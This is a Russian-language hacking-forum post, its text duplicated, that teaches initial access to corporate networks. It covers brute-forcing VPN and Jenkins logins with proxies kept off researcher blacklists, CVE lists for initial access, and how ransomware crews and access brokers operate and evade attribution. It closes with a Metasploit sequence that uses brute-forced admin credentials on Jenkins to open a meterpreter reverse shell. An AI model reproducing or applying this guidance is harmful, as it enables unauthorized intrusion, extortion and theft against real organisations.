- Регистрация
- 22.02.2025
- Сообщения
- 6
- Розыгрыши
- 0
- Реакции
- 0
Jittery не предоставил(а) никакой дополнительной информации.
Брутчекеры предоставил: RedTeam
Сетка для тестов codeby
Вступление
Все наверное наслышаны про группировку "DumpForums", которая активно показывает свои успешные атаки.
Спойлер: хек
Давайте разберемся как получить начальный доступ. Надеюсь данная статья будет полезна людям, которые держат свою небольшую инфраструктуру и не осведомлены о самых распространенных способах попасть в домен.
Для начала представим, что у нас свое королевство "домен". Разберемся каким корпоративным ПО будем пользоваться или же наши сотрудники, которое в теории может торчать из вне. В первую очередь наши сотрудники должны безопасно подключаться и запускать приложения в корпоративной сети. В этом нам поможет как ни странно корпоративный VPN.
Корпоративный VPN - как один из способов получить доступ
Корпоративные VPN (виртуальные частные сети) позволяют пользователям отправлять и получать информацию через общедоступную сеть так же безопасно, как если бы они были напрямую подключены к частной сети.
Как работают корпоративные VPN: VPN создают частную сеть через публичное интернет-подключение. Они предоставляют пользователям анонимность и конфиденциальность, скрывая их IP-адрес и защищая их соединения с помощью шифрования. Они также позволяют администраторам настраивать детализированный контроль доступа, который ограничивает доступ пользователей к областям сети, которые им не нужны.
Представьте себе VPN как секретный туннель между устройством пользователя и Интернетом; никто не может видеть, что пользователь делает внутри туннеля, кроме него самого и того, кому он отправляет данные, — даже поставщик интернет-услуг.
Давайте пока просто соберем полезную информацию и далее уже проанализируем. А в конце статьи получим доступ благодаря эксплоиту.
Check Point SASE — это надежная, быстрая, простая в развертывании, облачная платформа ZTNA. Она совместима с устройствами Windows, Mac, iOS, Android, Linux и Chromebook, а также со всеми основными поставщиками облачных услуг.
OpenVPN Access Server — это программное обеспечение VPN-сервера с собственным хостингом, которое обеспечивает безопасный удаленный доступ к частным сетям в облаке или локально. Пакет Enterprise предлагает индивидуальные цены для 500+ подключений.
Cisco AnyConnect — это управляемый политиками инструмент VPN, предназначенный для защиты сетевого доступа удаленных работников через проводные, беспроводные и VPN-подключения. Решение обеспечивает безопасный доступ к сети с любого устройства, в любое время и из любого места. Это Мощное масштабируемое VPN-решение для всех крупных предприятий, но особенно для тех, которые уже инвестировали в продукты кибербезопасности от Cisco. Информацию о ценах можно получить в Cisco по запросу.
Citrix Secure Private Access для крупных предприятий с удаленной или гибридной рабочей силой. Он также хорошо подходит для защиты подключений с устройств BYOD.
FortiClient — это мощный корпоративный VPN, который обеспечивает безопасный, но быстрый удаленный доступ. Его легкая архитектура, быстрые соединения и интуитивно понятный интерфейс позволяют ему обеспечивать высокий уровень безопасности, не нарушая производительности конечных пользователей.
SonicWall Global VPN Client (GVC) — один из четырех VPN-сервисов SonicWall. С помощью этого решения организации могут разрешить управляемым устройствам безопасно получать доступ к своим центрам обработки данных с помощью привычного удаленного VPN-опыта. VPN от SonicWall совместим с Windows, Mac, Android, iOS, ChromeOS, Linux и Amazon Kindle Fire.
- Если используют пароль для доступ к панельки впна - это беда, нужно хотя бы накрыть MFA или сертификатом
У каждой компании как правило есть свой бложик в котором есть инфа про обновы, патчи. Например: Для просмотра ссылки Войдиили Зарегистрируйся
Если чуть посерфить можно разобраться какие CVE`шки актуальны. Если клиент не поставил патч, не обновляет систему автоматически, то мы можем проэксплуатировать уязвимость.
. Запретите локальным учетным записям подключаться к VPN с аутентификацией только по паролю и другие полезные советы можно найти в блогах компаний, которые поставляют впн решения.
Компании также могут оставлять пуллы айпи адресов с которых происходят атаки. Необходимо их парсить и вычленять из своего листа прокси, нужно использовать чистые соксы, чтобы избежать блокировок или пропусков.
Код: Скопировать в буфер обмена
Взламывая учетные записи VPN, злоумышленники могут проникнуть в сеть. Они избегают обнаружения, маскируя вредоносные программы и вредоносные действия под легитимные процессы.
kill chain
1) Давайте посмотрим на классическую атаку с загрузкой веб шелла
Хронология атаки через веб-шелл, демонстрирующая хронологический порядок событий.
Залили шелл .aspx, получили шелл, провели разведку, создали аккаунт локального админа если позволяют права, прокинули сокс для доступа во внутрянку.
2) Взлом учетной записи VPN происходит, когда злоумышленник получает доступ к учетной записи VPN с помощью таких методов, как фишинг, эксплуатация уязвимостей или получение слабых учетных данных для входа. Оказавшись внутри, злоумышленник может выполнять вредоносные действия, используя скомпрометированную учетную запись, что позволяет ему проникнуть в сеть и обойти средства защиты. В зависимости от уровня доступа они могут перемещаться по горизонтали к высокоценным системам и развертывать дополнительные полезные нагрузки, такие как программы-вымогатели.
Начальный доступ: Ранние действия показали вход с IP-адреса VPN, исходящего с рабочей станции, которая соответствует соглашению об именовании среды хостов. Это могло помочь злоумышленнику замаскироваться и избежать немедленного подозрения.
"соглашению об именовании среды хостов" - я предполагаю амеры имели ввиду, что доброумышленник нашел ip сервера где хостится контора и купил себе сокс, который не привлечет внимания. К примеру узнал с какого города подключаются сотрудники и прорвался таким образом в впн панельку. А если б он заходил с Китая, то его быстренько бы выкинули.
Устойчивость: Злоумышленник развернул AnyDesk в среде и создал учетки., которые вместе со скомпрометированными добавил в группу «Пользователи удаленного рабочего стола» чтобы иметь доступ по RDP.
Уклонение от защиты: Пользовались легитимными инструментами, такими как anydesk.exe, net.exe. Помещали их в каталоги с именами «programdata» и «systemtest», чтобы возникло меньше подозрений.
Боковое перемещение: Использовали rdp, чтобы подключаться к скомпрометированным учеткам, wmiexec для выполнения удаленных команд.
Цепочка атак, показывающая события, произошедшие после успешной компрометации учетной записи VPN.
Подведем небольшие итоги. В большинстве своем все проблемы исходят потому что люди не следят за обновлениями ПО, так например заливали шелл в exchange. В 2025 до сих пор используют пароли без MFA.
По сути чтобы получить доступ достаточно раздобыть норм мат url;log;pass, приобрести/добыть хорошие прокси, которые еще не засветились у ресерчеров. Если вашими проксями уже кто-то брутил, то вы получите очень много пропусков. Вот к примеру смотрите
Человек с forum.mikrotik.com ведет свою собственную базу, вносит ip в блэклисты с которых происходили bruteforce атаки.
Рассмотрим некоторые обзоры американских ресерчеров
Далее я ознакомился с "flare" - это иностранная контора. Нам не особо интересно чем она занимается, лучше поговорим о статистике которую она привела. 36% доступов - это США контора, средний доступ стоит 1300$ (от 150$ до 100k$), селлеры также пишут, что есть доступ к бэкапам, чтобы доступ ушел быстрее (понятно почему), торгуют доступами на exploit, поставщиков доступов не так уж и много по словам flare, продают в основном RDP и VPN.
формат объявлений
А вот и статистика по гео подъехала.
В США находятся некоторые из самых дорогих компаний в мире, а также самый высокий в мире ВВП, что делает страну привлекательной целью для злоумышленников.
Во многих случаях варианты программ для кражи информации настроены на автоматическое отключение при запуске на хостах в стране, входящей в коалицию независимых государств (СНГ), что несколько ограничивает потенциальные страны для атаки.
Тот факт, что форум является российским, может помешать субъектам угроз публиковать информацию о нейтральных или союзных России целях, одновременно побуждая их выбирать страны, враждебные России. - мнение flare=)) А Украинцы тоже выбирают Америку потому что на враждебная
Мы насчитали 31 уникальное имя пользователя, продающее доступ к корпоративным ИТ-средам; однако семь основных субъектов были ответственны за большинство (55,6%) листингов. - эксперты насчитали 30+ селлеров доступов на экспе, 7 из которых проявляли самую большую активность. В целом они правильно подошли к тому, что статистику подводили на exploit, а не на xss.is. Все дело в том, что на экспе регистрация стоит 200 баксов и как бы нихуя себе, каждый день акки мало кто захочет менять в отличии от xss, где можно акк для безопасности менять после каждой сделки.
Мы рекомендуем отслеживать Exploit, XSS и другие форумы IAB, чтобы получать предварительное уведомление о том, что доступ к вашей среде может быть выставлен на продажу. - пишет flare.
Они имеют ввиду, что селлер указывает revenue по которому можно понять +- что это за контора. Поэтому лучше чаще менять ники на форумах, а revenue указывать диапазоном.
Initial Access Broker (IAB) - звено в цепи шифровальщиков, которое поставляет мат, то есть доступ. Их задача просто искать url;log;pass и брутить впны в большинстве своем. Кто покруче, более "творческий" использует 0day или фишинг. 0day - это уязвимость о которой уже знает вендор, но патч еще не вышел. Hack Forums, Breached, Nulled, CryptBB - это форумы на которых чаще всего продают доступы иностранные друзья. Стоит отметить, что доступ либо сдается в аренду (то есть под %), либо продается за фиксированную стоимость.
Оператор-программы-вымогателя - это группа лиц или отдельное лицо, которая занимается брендом, привлекает народ, рекламирует программу. Репутация - это самое дорогое у шифровальщиков, если зашифровать не тот объект (например больницу) или же не отдать ключи шифрования после получения выкупа, то придется делать ребрендинг :d
Data Manager - это группа лиц или отдельное лицо, которое обрабатывает данные корпорации. То есть удаляет дубликаты, проверяет данные на критичность, держит инфраструктуру с украденными данными, делает бэкапы, выкладывает публично или продает, в случае если не был получен выкуп.
Партнер по вымогательству - не все могут позволить себе разработать локер, поэтому берут уже хорошо сделанный продукт и платят %.
Переговорщик в экосистеме RaaS — это человек, который берет на себя задачу общения с жертвой (или представитель, т. е. специалист по переговорам с вымогателями). Наряду с записками о выкупе во многих кампаниях с вымогателями также может быть ссылка или контактные данные для связи. Задача этого специалиста получить как можно больший выкуп за короткий промежуток времени. Почему корпорации платят? Разные на то причины у кого то нет бэкапов, кто-то боится штрафов или раскрытия информации после которой придется закрыть предприятие) А если это больница, то там на счету человеческие жизни, если даже есть резервная копия данных, то пока это все восстановят могут погибнуть люди.
Для просмотра ссылки Войдиили Зарегистрируйся тут можно почитать интересные чаты с вымогателями. От себя добавлю, что помимо ключа шифрования, у некоторых партнерок есть возможность купить отчет по найденным уязвимостям, а также можно купить пруф что данные удалены. Не совсем уверен как это можно подтвердить ну ладно)
Chaser - это своего рода коллектор. Может обзванивать, слать письма, привлекать внимание, чтобы жертва быстрее оплатила выкуп. Был случай, когда распечатывали на принтерах организации письмо о том, что необходимо оплатить выкуп)))
Бухгалтер - тот кто отмывает полученные деньги. Могут использоваться миксеры. Обычно выкуп принимается в BTC, т.к эта монета сама ликвидная. Или из рода анонимных monero (xmr),
Думаю теперь +- ясно кто за что отвечает. А потом выкуп делиться на всю цепочку.
Программное обеспечение, которое широко используется в организациях.
Мы поговорили про owa, корпоративные впны, но совсем не обсудили какие ПО можно использовать для получения первоначального доступа. Также я составлю лист CVE, которые используют различные APT, а в конце статьи перейдем уже наконец к практике=)
CI/CD, или непрерывная интеграция/непрерывная доставка или развертывание, - это практика разработки программного обеспечения, обеспечиваемая автоматизацией. Частые и надежные обновления ускоряют циклы выпуска благодаря непрерывной доставке кода.
Вот список CI/CD решений.
Jenkins — широко используемый инструмент с открытым исходным кодом, доля которого на рынке CI/CD составляет 45 %, согласно данным Для просмотра ссылки Войдиили Зарегистрируйся . По состоянию на август 2023 года более 11 миллионов разработчиков использовали Jenkins для почти 49 миллионов рабочих нагрузок по всему миру. Около 50 000 неисправленных экземпляров Jenkins в январе, когда CVE была впервые раскрыта.
Вот тут подробнее про CI/CD инструменты: Для просмотра ссылки Войдиили Зарегистрируйся
Если вы хотите знать чуть больше других, то можете просто начать читать сайберсек блоги, чтобы понимать как получают initial access. Допустим мы знаем какой СОФТ используют корпорации (банально я привел на картинке и на хабре 38 инструментов CI/CD) возьмем в пример какой то нашумевший к примеру "Jenkins". Просто гуглим "Jenking initial access"
А вот собственно говоря kill chain. Человек с BF получает доступ к Jenkins server благодаря CVE-2024-23487, забирает SSH ключики, дампит все репозитории, извлекает секреты и далее проникает в другие сервисы.
А вот еще один killchain, Получили начальный доступ с помощью jenkins, который торчал внешне. Далее установили XMRig miner, запустил майнер. Таким образом доступы используют не только шифровальщики, на них еще можно майнить крипту. Стоит отметить что хакеры используют продуманные скрипты, которые сначала проверяют права на запись и только потом подгружают бинарь. Если нет прав, то записывают в /tmp. Также curl, wget может быть недоступен, тогда скрипт пытается загрузить бинарь с помощью
С помощью censys можно посмотреть сколько хостов с jenkins торчат извне. Далее форму можно брутать или использовать эксплоиты.
Надеюсь я вас не утомил. Но я хочу рассказать еще про один вариант, чтобы подтвердить, что доступы используют не только для шифровки)))
Взгляните этот killchain. Уязвимая среда Jenkins (Для просмотра ссылки Войдиили Зарегистрируйся) позволила злоумышленнику заблокировать пользователя, тем самым потерян доступ. Далее на этих облачных сервисов можно майнить крипту или что хуже просить выкуп.
Прикладываю статистику самых используемых CI/CD.
Стоит отслеживать сайберсек блоги американские. Там можно найти много полезной инфы.
Далее давайте соберем список CVE которые можно использовать первоначального доступа
старье, которое я нашел в каком-то сайберсек блоге. Поэтому я составлю свой список.
мой список
CVE-2024-43044 Jenkins Для просмотра ссылки Войдиили Зарегистрируйся Для просмотра ссылки Войди или Зарегистрируйся
CVE-2023-42793 Authentication Bypass in JetBrains TeamCity CI/CD
CVE-2024-27198 обход аутентификации с использованием уязвимости альтернативного пути в JetBrains
CVE-2024-27199 TeamCity server Для просмотра ссылки Войдиили Зарегистрируйся
CVE-2024-9264 Grafana
CVE-2023-22522 confluence
CVE-2024-47575 RCE FortiJump
CVE-2024-21683 confluence Для просмотра ссылки Войдиили Зарегистрируйся
Sonicwall rce CVE-2023-34124
CVE-2023-24489 Для просмотра ссылки Войдиили Зарегистрируйся
Microsoft Exchange ProxyNotShell RCE Для просмотра ссылки Войдиили Зарегистрируйся
думаю этого более чем достаточно на первых порах=))
Получаем доступ благодаря уязвимому jenkins
кодер RedTeam прислал свой мультитул в котором есть брут всех cms, впнов. Я выбрал jenkins.
Получили валидные креды админа.
Ну все. Получаем reverse shell.
Код: Скопировать в буфер обмена
Спасибо, всем хорошего настроения.
Сетка для тестов codeby
Вступление
Все наверное наслышаны про группировку "DumpForums", которая активно показывает свои успешные атаки.
Спойлер: хек
Давайте разберемся как получить начальный доступ. Надеюсь данная статья будет полезна людям, которые держат свою небольшую инфраструктуру и не осведомлены о самых распространенных способах попасть в домен.
Для начала представим, что у нас свое королевство "домен". Разберемся каким корпоративным ПО будем пользоваться или же наши сотрудники, которое в теории может торчать из вне. В первую очередь наши сотрудники должны безопасно подключаться и запускать приложения в корпоративной сети. В этом нам поможет как ни странно корпоративный VPN.
Корпоративный VPN - как один из способов получить доступ
Корпоративные VPN (виртуальные частные сети) позволяют пользователям отправлять и получать информацию через общедоступную сеть так же безопасно, как если бы они были напрямую подключены к частной сети.
Как работают корпоративные VPN: VPN создают частную сеть через публичное интернет-подключение. Они предоставляют пользователям анонимность и конфиденциальность, скрывая их IP-адрес и защищая их соединения с помощью шифрования. Они также позволяют администраторам настраивать детализированный контроль доступа, который ограничивает доступ пользователей к областям сети, которые им не нужны.
Представьте себе VPN как секретный туннель между устройством пользователя и Интернетом; никто не может видеть, что пользователь делает внутри туннеля, кроме него самого и того, кому он отправляет данные, — даже поставщик интернет-услуг.
Давайте пока просто соберем полезную информацию и далее уже проанализируем. А в конце статьи получим доступ благодаря эксплоиту.
Check Point SASE — это надежная, быстрая, простая в развертывании, облачная платформа ZTNA. Она совместима с устройствами Windows, Mac, iOS, Android, Linux и Chromebook, а также со всеми основными поставщиками облачных услуг.
OpenVPN Access Server — это программное обеспечение VPN-сервера с собственным хостингом, которое обеспечивает безопасный удаленный доступ к частным сетям в облаке или локально. Пакет Enterprise предлагает индивидуальные цены для 500+ подключений.
Cisco AnyConnect — это управляемый политиками инструмент VPN, предназначенный для защиты сетевого доступа удаленных работников через проводные, беспроводные и VPN-подключения. Решение обеспечивает безопасный доступ к сети с любого устройства, в любое время и из любого места. Это Мощное масштабируемое VPN-решение для всех крупных предприятий, но особенно для тех, которые уже инвестировали в продукты кибербезопасности от Cisco. Информацию о ценах можно получить в Cisco по запросу.
Citrix Secure Private Access для крупных предприятий с удаленной или гибридной рабочей силой. Он также хорошо подходит для защиты подключений с устройств BYOD.
FortiClient — это мощный корпоративный VPN, который обеспечивает безопасный, но быстрый удаленный доступ. Его легкая архитектура, быстрые соединения и интуитивно понятный интерфейс позволяют ему обеспечивать высокий уровень безопасности, не нарушая производительности конечных пользователей.
SonicWall Global VPN Client (GVC) — один из четырех VPN-сервисов SonicWall. С помощью этого решения организации могут разрешить управляемым устройствам безопасно получать доступ к своим центрам обработки данных с помощью привычного удаленного VPN-опыта. VPN от SonicWall совместим с Windows, Mac, Android, iOS, ChromeOS, Linux и Amazon Kindle Fire.
- Если используют пароль для доступ к панельки впна - это беда, нужно хотя бы накрыть MFA или сертификатом
У каждой компании как правило есть свой бложик в котором есть инфа про обновы, патчи. Например: Для просмотра ссылки Войди
Если чуть посерфить можно разобраться какие CVE`шки актуальны. Если клиент не поставил патч, не обновляет систему автоматически, то мы можем проэксплуатировать уязвимость.
. Запретите локальным учетным записям подключаться к VPN с аутентификацией только по паролю и другие полезные советы можно найти в блогах компаний, которые поставляют впн решения.
Компании также могут оставлять пуллы айпи адресов с которых происходят атаки. Необходимо их парсить и вычленять из своего листа прокси, нужно использовать чистые соксы, чтобы избежать блокировок или пропусков.
Код: Скопировать в буфер обмена
Код:
5.188.218.0/23
23.227.196.88
23.227.203.36
31.134.0.0/20
37.9.40.0/21
37.19.205.180
38.180.54.104
38.180.54.168
45.135.1.0/24
45.135.2.0/23
45.155.166.0/23
46.59.10.72
46.183.221.194
46.183.221.197
61.92.2.219
64.176.196.84
68.183.56.130
82.180.133.120
85.239.42.0/23
87.206.110.89
88.218.44.0/24
91.132.198.0/24
91.218.122.0/23
91.245.236.0/24
103.61.139.226
104.207.149.95
109.134.69.241
112.163.100.151
132.147.86.201
146.70.205.62
146.70.205.188
146.185.207.0/24
149.88.22.67
154.47.23.111
156.146.56.136
158.62.16.45
162.158.162.254
167.61.244.201
167.99.112.236
178.236.234.123
183.96.10.14
185.213.20.20
185.217.0.242
192.71.26.106
193.233.128.0/22
193.233.216.0/21
195.14.123.132
198.44.211.76
203.160.68.12
217.145.225.0/24
221.154.174.74Взламывая учетные записи VPN, злоумышленники могут проникнуть в сеть. Они избегают обнаружения, маскируя вредоносные программы и вредоносные действия под легитимные процессы.
kill chain
1) Давайте посмотрим на классическую атаку с загрузкой веб шелла
Хронология атаки через веб-шелл, демонстрирующая хронологический порядок событий.
Залили шелл .aspx, получили шелл, провели разведку, создали аккаунт локального админа если позволяют права, прокинули сокс для доступа во внутрянку.
2) Взлом учетной записи VPN происходит, когда злоумышленник получает доступ к учетной записи VPN с помощью таких методов, как фишинг, эксплуатация уязвимостей или получение слабых учетных данных для входа. Оказавшись внутри, злоумышленник может выполнять вредоносные действия, используя скомпрометированную учетную запись, что позволяет ему проникнуть в сеть и обойти средства защиты. В зависимости от уровня доступа они могут перемещаться по горизонтали к высокоценным системам и развертывать дополнительные полезные нагрузки, такие как программы-вымогатели.
Начальный доступ: Ранние действия показали вход с IP-адреса VPN, исходящего с рабочей станции, которая соответствует соглашению об именовании среды хостов. Это могло помочь злоумышленнику замаскироваться и избежать немедленного подозрения.
"соглашению об именовании среды хостов" - я предполагаю амеры имели ввиду, что доброумышленник нашел ip сервера где хостится контора и купил себе сокс, который не привлечет внимания. К примеру узнал с какого города подключаются сотрудники и прорвался таким образом в впн панельку. А если б он заходил с Китая, то его быстренько бы выкинули.
Устойчивость: Злоумышленник развернул AnyDesk в среде и создал учетки., которые вместе со скомпрометированными добавил в группу «Пользователи удаленного рабочего стола» чтобы иметь доступ по RDP.
Уклонение от защиты: Пользовались легитимными инструментами, такими как anydesk.exe, net.exe. Помещали их в каталоги с именами «programdata» и «systemtest», чтобы возникло меньше подозрений.
Боковое перемещение: Использовали rdp, чтобы подключаться к скомпрометированным учеткам, wmiexec для выполнения удаленных команд.
Цепочка атак, показывающая события, произошедшие после успешной компрометации учетной записи VPN.
Подведем небольшие итоги. В большинстве своем все проблемы исходят потому что люди не следят за обновлениями ПО, так например заливали шелл в exchange. В 2025 до сих пор используют пароли без MFA.
По сути чтобы получить доступ достаточно раздобыть норм мат url;log;pass, приобрести/добыть хорошие прокси, которые еще не засветились у ресерчеров. Если вашими проксями уже кто-то брутил, то вы получите очень много пропусков. Вот к примеру смотрите
Человек с forum.mikrotik.com ведет свою собственную базу, вносит ip в блэклисты с которых происходили bruteforce атаки.
Рассмотрим некоторые обзоры американских ресерчеров
Далее я ознакомился с "flare" - это иностранная контора. Нам не особо интересно чем она занимается, лучше поговорим о статистике которую она привела. 36% доступов - это США контора, средний доступ стоит 1300$ (от 150$ до 100k$), селлеры также пишут, что есть доступ к бэкапам, чтобы доступ ушел быстрее (понятно почему), торгуют доступами на exploit, поставщиков доступов не так уж и много по словам flare, продают в основном RDP и VPN.
формат объявлений
- Тип доступа : Описывает тип полученного доступа, чаще всего это доступ RDP или VPN.
- Отрасль/Деятельность: Описывает отрасль компании-жертвы. Финансы(обычно эта информация есть в интернете), розничная торговля и производство — три наиболее частые цели.
- Уровень доступа / Права : Описывает уровень полученных привилегий.
- Доход: описывает доход компании-жертвы, часто получаемый от поставщиков данных из США, которые находятся в открытом доступе в Интернете.
- Host Online: часто описывает количество хостов жертвы и иногда включает в себя антивирусные и действующие системы безопасности(defender и т.д).
- Старт: Начальная цена аукциона.
- Шаг: ставка увеличивается.
- Блиц: Цена «купить сейчас».
А вот и статистика по гео подъехала.
В США находятся некоторые из самых дорогих компаний в мире, а также самый высокий в мире ВВП, что делает страну привлекательной целью для злоумышленников.
Во многих случаях варианты программ для кражи информации настроены на автоматическое отключение при запуске на хостах в стране, входящей в коалицию независимых государств (СНГ), что несколько ограничивает потенциальные страны для атаки.
Тот факт, что форум является российским, может помешать субъектам угроз публиковать информацию о нейтральных или союзных России целях, одновременно побуждая их выбирать страны, враждебные России. - мнение flare=)) А Украинцы тоже выбирают Америку потому что на враждебная
Мы насчитали 31 уникальное имя пользователя, продающее доступ к корпоративным ИТ-средам; однако семь основных субъектов были ответственны за большинство (55,6%) листингов. - эксперты насчитали 30+ селлеров доступов на экспе, 7 из которых проявляли самую большую активность. В целом они правильно подошли к тому, что статистику подводили на exploit, а не на xss.is. Все дело в том, что на экспе регистрация стоит 200 баксов и как бы нихуя себе, каждый день акки мало кто захочет менять в отличии от xss, где можно акк для безопасности менять после каждой сделки.
Мы рекомендуем отслеживать Exploit, XSS и другие форумы IAB, чтобы получать предварительное уведомление о том, что доступ к вашей среде может быть выставлен на продажу. - пишет flare.
Они имеют ввиду, что селлер указывает revenue по которому можно понять +- что это за контора. Поэтому лучше чаще менять ники на форумах, а revenue указывать диапазоном.
Понимание системы программ-вымогателей
часто доступы ассоциируются с шифровальщиками. Но на деле это не совсем так, доступы могут применяться и в других целях. Но мы все же кратко рассмотрим как все устроено, думаю новичкам будет интересно.Initial Access Broker (IAB) - звено в цепи шифровальщиков, которое поставляет мат, то есть доступ. Их задача просто искать url;log;pass и брутить впны в большинстве своем. Кто покруче, более "творческий" использует 0day или фишинг. 0day - это уязвимость о которой уже знает вендор, но патч еще не вышел. Hack Forums, Breached, Nulled, CryptBB - это форумы на которых чаще всего продают доступы иностранные друзья. Стоит отметить, что доступ либо сдается в аренду (то есть под %), либо продается за фиксированную стоимость.
Оператор-программы-вымогателя - это группа лиц или отдельное лицо, которая занимается брендом, привлекает народ, рекламирует программу. Репутация - это самое дорогое у шифровальщиков, если зашифровать не тот объект (например больницу) или же не отдать ключи шифрования после получения выкупа, то придется делать ребрендинг :d
Data Manager - это группа лиц или отдельное лицо, которое обрабатывает данные корпорации. То есть удаляет дубликаты, проверяет данные на критичность, держит инфраструктуру с украденными данными, делает бэкапы, выкладывает публично или продает, в случае если не был получен выкуп.
Партнер по вымогательству - не все могут позволить себе разработать локер, поэтому берут уже хорошо сделанный продукт и платят %.
Переговорщик в экосистеме RaaS — это человек, который берет на себя задачу общения с жертвой (или представитель, т. е. специалист по переговорам с вымогателями). Наряду с записками о выкупе во многих кампаниях с вымогателями также может быть ссылка или контактные данные для связи. Задача этого специалиста получить как можно больший выкуп за короткий промежуток времени. Почему корпорации платят? Разные на то причины у кого то нет бэкапов, кто-то боится штрафов или раскрытия информации после которой придется закрыть предприятие) А если это больница, то там на счету человеческие жизни, если даже есть резервная копия данных, то пока это все восстановят могут погибнуть люди.
Для просмотра ссылки Войди
Chaser - это своего рода коллектор. Может обзванивать, слать письма, привлекать внимание, чтобы жертва быстрее оплатила выкуп. Был случай, когда распечатывали на принтерах организации письмо о том, что необходимо оплатить выкуп)))
Бухгалтер - тот кто отмывает полученные деньги. Могут использоваться миксеры. Обычно выкуп принимается в BTC, т.к эта монета сама ликвидная. Или из рода анонимных monero (xmr),
Думаю теперь +- ясно кто за что отвечает. А потом выкуп делиться на всю цепочку.
Программное обеспечение, которое широко используется в организациях.
Мы поговорили про owa, корпоративные впны, но совсем не обсудили какие ПО можно использовать для получения первоначального доступа. Также я составлю лист CVE, которые используют различные APT, а в конце статьи перейдем уже наконец к практике=)
CI/CD, или непрерывная интеграция/непрерывная доставка или развертывание, - это практика разработки программного обеспечения, обеспечиваемая автоматизацией. Частые и надежные обновления ускоряют циклы выпуска благодаря непрерывной доставке кода.
Вот список CI/CD решений.
Jenkins — широко используемый инструмент с открытым исходным кодом, доля которого на рынке CI/CD составляет 45 %, согласно данным Для просмотра ссылки Войди
Вот тут подробнее про CI/CD инструменты: Для просмотра ссылки Войди
Если вы хотите знать чуть больше других, то можете просто начать читать сайберсек блоги, чтобы понимать как получают initial access. Допустим мы знаем какой СОФТ используют корпорации (банально я привел на картинке и на хабре 38 инструментов CI/CD) возьмем в пример какой то нашумевший к примеру "Jenkins". Просто гуглим "Jenking initial access"
А вот собственно говоря kill chain. Человек с BF получает доступ к Jenkins server благодаря CVE-2024-23487, забирает SSH ключики, дампит все репозитории, извлекает секреты и далее проникает в другие сервисы.
А вот еще один killchain, Получили начальный доступ с помощью jenkins, который торчал внешне. Далее установили XMRig miner, запустил майнер. Таким образом доступы используют не только шифровальщики, на них еще можно майнить крипту. Стоит отметить что хакеры используют продуманные скрипты, которые сначала проверяют права на запись и только потом подгружают бинарь. Если нет прав, то записывают в /tmp. Также curl, wget может быть недоступен, тогда скрипт пытается загрузить бинарь с помощью
openssl s_client -connect remote_host:port к примеру.С помощью censys можно посмотреть сколько хостов с jenkins торчат извне. Далее форму можно брутать или использовать эксплоиты.
Надеюсь я вас не утомил. Но я хочу рассказать еще про один вариант, чтобы подтвердить, что доступы используют не только для шифровки)))
Взгляните этот killchain. Уязвимая среда Jenkins (Для просмотра ссылки Войди
Прикладываю статистику самых используемых CI/CD.
Стоит отслеживать сайберсек блоги американские. Там можно найти много полезной инфы.
Далее давайте соберем список CVE которые можно использовать первоначального доступа
старье, которое я нашел в каком-то сайберсек блоге. Поэтому я составлю свой список.
| Vulnerability | Associated Software |
| CVE-2017-3066 | Apache BlazeDS library |
| CVE-2017-7269 | Microsoft Windows Server 2003 R2 |
| CVE-2017-10271 | Oracle WebLogic Server |
| CVE-2018-13379 | Fortinet FortiOS and FortiProxy |
| CVE-2019-0604 | Microsoft SharePoint |
| CVE-2019-19781 | Citrix Application Delivery Controller |
| CVE-2019-11510 | Pulse Connect Secure |
| CVE-2019-9670 | Synacor Zimbra Collaboration Suite |
| CVE-2019-18935 | ASP.NET AJAX |
| CVE 2020-0688 CVE-2021-26855 CVE-2021-26857 CVE-2021-26858 CVE-2021-27065 CVE 2020-17144 | Microsoft Exchange Server |
| CVE-2021-44228 | Apache Log4j2 |
| CVE-2020-10189 | Zoho ManageEngine Desktop Central |
| CVE-2020-5902 | BIG-IP |
мой список
CVE-2024-43044 Jenkins Для просмотра ссылки Войди
CVE-2023-42793 Authentication Bypass in JetBrains TeamCity CI/CD
CVE-2024-27198 обход аутентификации с использованием уязвимости альтернативного пути в JetBrains
CVE-2024-27199 TeamCity server Для просмотра ссылки Войди
CVE-2024-9264 Grafana
CVE-2023-22522 confluence
CVE-2024-47575 RCE FortiJump
CVE-2024-21683 confluence Для просмотра ссылки Войди
Sonicwall rce CVE-2023-34124
CVE-2023-24489 Для просмотра ссылки Войди
Microsoft Exchange ProxyNotShell RCE Для просмотра ссылки Войди
думаю этого более чем достаточно на первых порах=))
Получаем доступ благодаря уязвимому jenkins
кодер RedTeam прислал свой мультитул в котором есть брут всех cms, впнов. Я выбрал jenkins.
Получили валидные креды админа.
Ну все. Получаем reverse shell.
Код: Скопировать в буфер обмена
Код:
msfconsole
use exploit/multi/http/jenkins_script_console
show targets - выбираем windows если выбран linux
set payload windows/x64/meterpreter/reverse_tcp - куда будем ловить
set RPORT 8080
set RHOSTS ip
set targeturi /
set username admin
set password Qwerty11!
set LHOST 10.0.0.95
runСпасибо, всем хорошего настроения.